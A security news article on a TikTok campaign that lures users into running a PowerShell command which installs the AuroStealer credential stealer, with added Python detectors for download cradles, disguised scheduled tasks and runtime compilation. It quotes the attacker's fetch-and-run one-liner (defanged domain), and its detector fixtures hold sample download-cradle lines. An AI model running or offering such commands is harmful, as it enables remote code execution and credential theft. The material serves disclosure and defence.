TikTok Videos Lure Users Into Installing Self Compiling AuroStealer Malware

Cybercriminals are exploiting TikTok’s massive user base to distribute sophisticated malware, luring victims with promises of free software activation but delivering dangerous payloads instead. The attack leverages social engineering, similar to the ClickFix technique, tricking unsuspecting users into executing malicious PowerShell commands on their own systems. 

The Infection Chain 

Victims encounter TikTok videos that offer free activation for popular software like Photoshop, with one detected video accumulating over 500 likes before it was identified. The attack requires users to follow explicit instructions to open PowerShell with administrator privileges and run a simple, one-line command: iex (irm slmgr[.]win/photoshop). 

This initial infection vector fetches and executes malicious PowerShell code from a remote server. The script then downloads a second-stage executable, updater.exe, which has been identified as the AuroStealer malware. AuroStealer is designed to harvest sensitive credentials and system information. 
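As an added illustration (not part of the original article or of the researchers' tooling), the following Python script shows how a defender can flag that "fetch and evaluate" pattern in PowerShell script-block logs (Event ID 4104 text). The sample log lines are constructed for this example; the first one mirrors the command quoted above, and the example.invalid hosts are placeholders.

```python
import re

# Constructed sample script-block texts in the shape a defender would pull from
# PowerShell script-block logging (Event ID 4104). These are made up for this
# example, not captured logs; the first mirrors the command quoted in the article.
SAMPLE_SCRIPT_BLOCKS = [
    "iex (irm slmgr[.]win/photoshop)",
    "Invoke-Expression (Invoke-RestMethod 'http://example.invalid/stage1.ps1')",
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')",
    "Get-ChildItem C:\\Users | Select-Object Name",
    "Invoke-RestMethod https://api.example.invalid/status | ConvertTo-Json",
    "$r = iwr http://example.invalid/x; iex $r.Content",
]

# Cmdlets and methods that pull content from the network, including the short
# aliases (irm, iwr) that the TikTok instructions rely on.
FETCH_PATTERN = re.compile(
    r"\b(irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring|downloaddata)\b",
    re.IGNORECASE,
)
# Constructs that evaluate a string as code.
EXEC_PATTERN = re.compile(r"\b(iex|invoke-expression)\b", re.IGNORECASE)


def classify(block: str) -> str:
    """Return 'download-cradle' when a block both fetches remote content and
    evaluates it, 'remote-fetch' when it only fetches, else 'benign'."""
    fetches = FETCH_PATTERN.search(block) is not None
    executes = EXEC_PATTERN.search(block) is not None
    if fetches and executes:
        return "download-cradle"
    if fetches:
        return "remote-fetch"
    return "benign"


def scan(blocks):
    """Classify every block; returns (block, verdict) pairs in input order."""
    return [(block, classify(block)) for block in blocks]


def cradle_count(blocks) -> int:
    """Number of blocks that fetch and immediately evaluate remote content."""
    return sum(1 for _, verdict in scan(blocks) if verdict == "download-cradle")


if __name__ == "__main__":
    for block, verdict in scan(SAMPLE_SCRIPT_BLOCKS):
        print(f"{verdict:16} {block}")
```

The point of the two-pattern split is that a remote fetch on its own is routine administration, while a fetch whose result is handed straight to Invoke-Expression is almost never legitimate on an end-user workstation; the "remote-fetch" verdict is kept as low-priority context so the rule does not drown in noise.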

Evasion and Persistence 

Internet Storm Center researchers found that the malware achieves persistence through scheduled tasks disguised as legitimate system components. It picks names such as “MicrosoftEdgeUpdateTaskMachineCore” at random so that the task blends in with genuine Windows tasks, and the task is set to run every time the user logs on. 
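As an added example (not code from the article or from the researchers), the Python audit below shows how to check a host's scheduled tasks for exactly this trick: a task whose name imitates a well-known updater but whose action points somewhere other than the updater's real binary, or into a user-writable directory. The expected-binary paths are an assumption based on typical default installs, and the task records, GUID and the AppData path for updater.exe are all constructed for the example.

```python
# Directories and binaries the imitated task names normally launch. This mapping
# is an assumption made for the example (typical default-install paths), not a
# vendor-published reference; tune it from a known-clean baseline host.
EXPECTED_TASK_BINARIES = {
    "MicrosoftEdgeUpdateTaskMachineCore":
        r"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe",
    "MicrosoftEdgeUpdateTaskMachineUA":
        r"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe",
    "GoogleUpdateTaskMachineCore":
        r"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe",
}

# Path fragments a normal user can write to; an "update" task that runs from one
# of these is worth a look regardless of its name.
USER_WRITABLE_MARKERS = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\")

# Constructed task records in the shape of a `schtasks /query /v` export.
# The GUID, user name and the AppData path are made up for this example.
SAMPLE_TASKS = [
    {"name": "MicrosoftEdgeUpdateTaskMachineCore{11111111-2222-3333-4444-555555555555}",
     "action": r'"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /c',
     "trigger": "daily"},
    {"name": "MicrosoftEdgeUpdateTaskMachineCore",
     "action": r'"C:\Users\alice\AppData\Roaming\updater.exe"',
     "trigger": "logon"},
    {"name": "Adobe Acrobat Update Task",
     "action": r'"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"',
     "trigger": "daily"},
]


def executable_of(action: str) -> str:
    """Extract the program path from a task action, quoted or not."""
    action = action.strip()
    if action.startswith('"'):
        return action[1:action.index('"', 1)]
    return action.split(" ", 1)[0]


def family_of(task_name: str):
    """Return the well-known task name this task imitates, if any."""
    for family in EXPECTED_TASK_BINARIES:
        if task_name.startswith(family):
            return family
    return None


def audit_task(task) -> list:
    """Reasons the task looks like disguised persistence; empty means clean."""
    exe = executable_of(task["action"])
    exe_lower = exe.lower()
    reasons = []
    family = family_of(task["name"])
    if family and exe_lower != EXPECTED_TASK_BINARIES[family].lower():
        reasons.append(f"name imitates {family} but runs {exe}")
    if any(marker in exe_lower for marker in USER_WRITABLE_MARKERS):
        reasons.append("executable lives in a user-writable directory")
    if reasons and task.get("trigger") == "logon":
        reasons.append("runs at every logon")
    return reasons


def audit(tasks) -> dict:
    """Map each task name to its list of findings."""
    return {task["name"]: audit_task(task) for task in tasks}


if __name__ == "__main__":
    for name, findings in audit(SAMPLE_TASKS).items():
        print(name, "->", findings or "ok")
```

On a real host the records come from `schtasks /query /fo CSV /v` or Get-ScheduledTask; the comparison is deliberately on the full executable path rather than the file name, because copying a binary named like the real updater into AppData is the obvious way to defeat a name-only check.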

The campaign then adds an evasion step with a third payload, source.exe. Rather than shipping a finished binary, this file compiles its own C# code on the victim's machine by invoking the .NET Framework compiler at run time. Because the malicious logic exists only as source text until that moment, this dynamic compilation helps the payload slip past traditional file-based detection. The compiled C# code then allocates executable memory in the process, copies shellcode into it, and starts a new thread to run the payload without writing any additional files to disk. 
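As an added detection example (not from the article or the researchers), the Python below scores process-creation events for the runtime-compilation step: the .NET compiler (csc.exe or vbc.exe) being launched by something other than a build tool, and working through files under a temp directory. The events are constructed for the example; the parent path for source.exe, the user name and the temp file name are placeholders, and the list of "expected" parents and the assumption that the compiler is driven through %TEMP% response files are both assumptions to tune against a known-clean baseline.

```python
# Process-creation events in the shape a Sysmon Event ID 1 or EDR feed would
# give; all values are constructed for this example.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "parent_image": r"C:\Users\alice\Downloads\source.exe",
     "command_line": r'csc.exe /noconfig /fullpaths @"C:\Users\alice\AppData\Local\Temp\abc123.cmdline"'},
    {"image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "parent_image": r"C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\MSBuild.exe",
     "command_line": r"csc.exe /noconfig /out:C:\src\app\bin\app.dll C:\src\app\Program.cs"},
    {"image": r"C:\Windows\System32\notepad.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "notepad.exe"},
]

COMPILERS = {"csc.exe", "vbc.exe"}
# Parents expected to drive the compiler on a developer workstation; this set is
# an assumption for the example, extend it from your own baseline.
EXPECTED_PARENTS = {"msbuild.exe", "devenv.exe", "dotnet.exe", "vbcscompiler.exe"}
# Runtime compilation typically stages source, response and output files here.
TEMP_MARKERS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\")


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def assess_compile(event):
    """Return None for non-compiler processes, otherwise a list of reasons the
    compiler launch looks like runtime compilation by a non-developer process."""
    if basename(event["image"]) not in COMPILERS:
        return None
    reasons = []
    parent = basename(event["parent_image"])
    if parent not in EXPECTED_PARENTS:
        reasons.append(f"compiler started by unexpected parent {parent}")
    if any(marker in event["command_line"].lower() for marker in TEMP_MARKERS):
        reasons.append("compiler reads or writes under a temp directory")
    return reasons


def suspicious_compiles(events):
    """(parent name, reasons) for every compiler launch with at least one reason."""
    hits = []
    for event in events:
        reasons = assess_compile(event)
        if reasons:
            hits.append((basename(event["parent_image"]), reasons))
    return hits


if __name__ == "__main__":
    for parent, reasons in suspicious_compiles(SAMPLE_EVENTS):
        print(f"{parent}: {'; '.join(reasons)}")
```

A build server will trip the temp-directory reason constantly, so in practice the parent check carries the weight; the value of this rule is that it catches the compilation step before the in-memory injection that follows, which leaves far fewer artefacts.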

Researchers have discovered multiple variations of this campaign across TikTok, all targeting users searching for cracked software. This highlights the severe risks of downloading applications from any untrusted source. 
